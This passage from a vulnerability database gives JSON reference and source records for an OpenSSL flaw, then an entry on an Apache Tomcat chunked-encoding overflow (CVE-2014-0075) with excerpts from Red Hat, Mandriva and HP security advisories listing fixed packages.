        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022527"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005376"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962520"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963954"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966723"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022655"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022724"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022797"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098801"
      },
      {
        "trust": 0.3,
        "url": "http://www.fortiguard.com/advisory/fg-ir-15-014/"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962047"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962550"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962519"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964241"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962039"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962833"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020862"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022647"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961800"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960633"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963096"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961111"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960713"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964033"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964441"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903425"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960157"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020840"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961179"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962623"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959518"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961438"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961569"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005373"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005434"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960041"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960045"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961565"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961837"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962714"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962890"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963498"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964686"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964766"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966356"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966481"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966484"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966847"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966873"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967146"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968724"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968871"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969177"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969271"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970020"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970103"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970667"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21971238"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972125"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974116"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000137"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978471"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964030"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966381"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022618"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005364"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965643"
      },
      {
        "trust": 0.2,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n"
      },
      {
        "trust": 0.2,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.2,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-1788"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2639-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=43094"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1792"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1790"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1791"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4000"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1788"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1789"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1793"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?doci"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1789\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:10/openssl-8.4.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/news/secadv_20150611.txt\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4000\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1790\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:10/openssl-10.1.patch"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-15:10.openssl.asc\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1791\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:10/openssl-10.1.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:10/openssl-8.4.patch"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1788\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1792\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1791"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1789"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1792"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1790"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/swpublishing/mtx-b59b11be53744759a650eadeb4"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/go/sim"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/secpolicy.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/releasestrat.html),"
      },
      {
        "trust": 0.1,
        "url": "https://rt.openssl.org/ticket/display.html?id=3286"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "BID",
        "id": "75158"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "PACKETSTORM",
        "id": "132398"
      },
      {
        "db": "PACKETSTORM",
        "id": "132291"
      },
      {
        "db": "PACKETSTORM",
        "id": "137772"
      },
      {
        "db": "PACKETSTORM",
        "id": "132288"
      },
      {
        "db": "PACKETSTORM",
        "id": "132285"
      },
      {
        "db": "PACKETSTORM",
        "id": "136989"
      },
      {
        "db": "PACKETSTORM",
        "id": "169629"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "BID",
        "id": "75158"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "PACKETSTORM",
        "id": "132398"
      },
      {
        "db": "PACKETSTORM",
        "id": "132291"
      },
      {
        "db": "PACKETSTORM",
        "id": "137772"
      },
      {
        "db": "PACKETSTORM",
        "id": "132288"
      },
      {
        "db": "PACKETSTORM",
        "id": "132285"
      },
      {
        "db": "PACKETSTORM",
        "id": "136989"
      },
      {
        "db": "PACKETSTORM",
        "id": "169629"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-06-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "date": "2015-06-11T00:00:00",
        "db": "BID",
        "id": "75158"
      },
      {
        "date": "2015-06-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "date": "2015-06-22T14:14:00",
        "db": "PACKETSTORM",
        "id": "132398"
      },
      {
        "date": "2015-06-15T15:43:16",
        "db": "PACKETSTORM",
        "id": "132291"
      },
      {
        "date": "2016-07-05T18:18:00",
        "db": "PACKETSTORM",
        "id": "137772"
      },
      {
        "date": "2015-06-12T13:25:28",
        "db": "PACKETSTORM",
        "id": "132288"
      },
      {
        "date": "2015-06-12T13:17:58",
        "db": "PACKETSTORM",
        "id": "132285"
      },
      {
        "date": "2016-05-13T16:14:13",
        "db": "PACKETSTORM",
        "id": "136989"
      },
      {
        "date": "2015-06-11T12:12:12",
        "db": "PACKETSTORM",
        "id": "169629"
      },
      {
        "date": "2015-06-12T19:59:01.600000",
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-12-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "date": "2018-10-08T08:00:00",
        "db": "BID",
        "id": "75158"
      },
      {
        "date": "2017-03-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "date": "2022-12-13T12:15:14.860000",
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "75158"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  crypto/bn/bn_gf2m.c of  BN_GF2m_mod_inv Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Failure to Handle Exceptional Conditions",
    "sources": [
      {
        "db": "BID",
        "id": "75158"
      }
    ],
    "trust": 0.3
  }
}

VAR-201405-0543

Vulnerability from variot - Updated: 2024-07-23 20:25

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data. Description:

Red Hat JBoss Data Virtualization is a lean data integration solution that provides easy, real-time, and unified data access across disparate sources to multiple applications and users. JBoss Data Virtualization makes data spread across physically distinct systems-such as multiple databases, XML files, and even Hadoop systems-appear as a set of tables in a local database.

This roll up patch serves as a cumulative upgrade for Red Hat JBoss Data Virtualization 6.0.0. It includes various bug fixes, which are listed in the README file included with the patch files.

The following security issues are also fixed with this release, descriptions of which can be found on the respective CVE pages linked in the References section. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: tomcat security update Advisory ID: RHSA-2014:0827-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0827.html Issue date: 2014-07-02 CVE Names: CVE-2014-0075 CVE-2014-0096 CVE-2014-0099 =====================================================================

Summary:

Updated tomcat packages that fix three security issues are now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch Red Hat Enterprise Linux Client Optional (v. 7) - noarch Red Hat Enterprise Linux ComputeNode (v. 7) - noarch Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Enterprise Linux Server Optional (v. 7) - noarch Red Hat Enterprise Linux Workstation (v. 7) - noarch Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

Description:

Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. (CVE-2014-0075)

It was found that Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a Tomcat server located behind a reverse proxy that processed the content length header correctly. (CVE-2014-0099)

The CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product Security.

All Tomcat 7 users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. Tomcat must be restarted for this update to take effect.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: tomcat-7.0.42-6.el7_0.src.rpm

noarch: tomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch: tomcat-7.0.42-6.el7_0.noarch.rpm tomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm tomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm tomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm tomcat-javadoc-7.0.42-6.el7_0.noarch.rpm tomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm tomcat-jsvc-7.0.42-6.el7_0.noarch.rpm tomcat-lib-7.0.42-6.el7_0.noarch.rpm tomcat-webapps-7.0.42-6.el7_0.noarch.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: tomcat-7.0.42-6.el7_0.src.rpm

noarch: tomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Red Hat Enterprise Linux Server (v. 7):

Source: tomcat-7.0.42-6.el7_0.src.rpm

noarch: tomcat-7.0.42-6.el7_0.noarch.rpm tomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm tomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm tomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm tomcat-lib-7.0.42-6.el7_0.noarch.rpm tomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm tomcat-webapps-7.0.42-6.el7_0.noarch.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Red Hat Enterprise Linux Workstation (v. 7):

Source: tomcat-7.0.42-6.el7_0.src.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch: tomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm tomcat-javadoc-7.0.42-6.el7_0.noarch.rpm tomcat-jsvc-7.0.42-6.el7_0.noarch.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFTs8+9XlSAg2UNWIIRAglqAJ4sw3DT+V4pFReZSRvkoW+f90gxdgCdFn5e bVOeybWcY1fm+xgpnE7T2ZM= =O2as -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2014-0096)

It was found that, in certain circumstances, it was possible for a malicious web application to replace the XML parsers used by JBoss Web to process XSLTs for the default servlet, JSP documents, tag library descriptors (TLDs), and tag plug-in configuration files. The injected XML parser(s) could then bypass the limits imposed on XML external entities and/or gain access to the XML files processed for other web applications deployed on the same JBoss Web instance. On update, the configuration files that have been locally modified will not be updated. The updated version of such files will be stored as the rpmnew files. Make sure to locate any such files after the update and merge any changes manually. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Mandriva Linux Security Advisory MDVSA-2015:052 http://www.mandriva.com/en/support/security/

Package : tomcat Date : March 3, 2015 Affected: Business Server 1.0

Problem Description:

Updated tomcat packages fix security vulnerabilities:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFU9XSSmqjQ0CJFipgRAorsAKDX0BTWLEiMn3+FR9/Xn58Pw7GIMwCfRAbS NzlDtJatpPDeZdZ4nlO1fgg= =NWBY -----END PGP SIGNATURE----- . Solution:

The References section of this erratum contains a download link (you must log in to download the update). It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04483248

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04483248 Version: 1

HPSBUX03150 SSRT101681 rev.1 - HP-UX Apache Server Suite running Apache Tomcat or PHP, Remote Denial of Service (DoS) and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-10-20 Last Updated: 2014-10-20

Potential Security Impact: Remote Denial of Service (DoS), man-in-the-middle (MitM) attack, HTTP request smuggling, modification of data; local modification of data

Source: Hewlett-Packard Company, HP Software Security Response Team

References:

CVE-2013-4248 - PHP: man-in-the-middle (MitM) attack

CVE-2013-4286 - Tomcat: remote HTTP request smuggling

CVE-2013-6438 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0075 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0098 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0099 - Tomcat: remote HTTP request smuggling

CVE-2014-3981 - PHP: local modification of data

SSRT101681

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.23 running HP-UX Apache Web Server Suite v3.29 or earlier

HP-UX B.11.23 running Tomcat v5.5.36.01 or earlier

HP-UX B.11.23 running PHP v5.2.17.03 or earlier

BACKGROUND

CVSS 2.0 Base Metrics

RESOLUTION

HP has provided the following software updates to resolve the vulnerabilities.

The updates are available for download from http://software.hp.com

NOTE: HP-UX Web Server Suite v3.30 HPUXWSATW330 contains Apache v2.2.15.21, Tomcat Servlet Engine 5.5.36.02, and PHP 5.2.17.04

HP-UX 11i Release Apache Depot name

B.11.23 (11i v2 32-bit) HP_UX_11.23_HPUXWS22ATW-B330-11-23-32.depot

B.11.23 (11i v2 64-bit) HP_UX_11.23_HPUXWS22ATW-B330-11-23-64.depot

MANUAL ACTIONS: Yes - Update Install HP-UX Web Server Suite v3.30 or subsequent

PRODUCT SPECIFIC INFORMATION

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23

END AFFECTED VERSIONS

HISTORY Version:1 (rev.1) - 20 October 2014 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

This update also fixes the following bugs:

The patch that resolved the CVE-2014-0050 issue contained redundant code. This update removes the redundant code. (BZ#1094528)
The patch that resolved the CVE-2013-4322 issue contained an invalid check that triggered a java.io.EOFException while reading trailer headers for chunked requests. This update fixes the check and the aforementioned exception is no longer triggered in the described scenario

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0543",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.30"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.37"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.33"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.32"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.35"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.36"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.29"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.31"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "6.0.28"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.25"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.31"
      },
      {
        "model": "tomcat",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.39"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
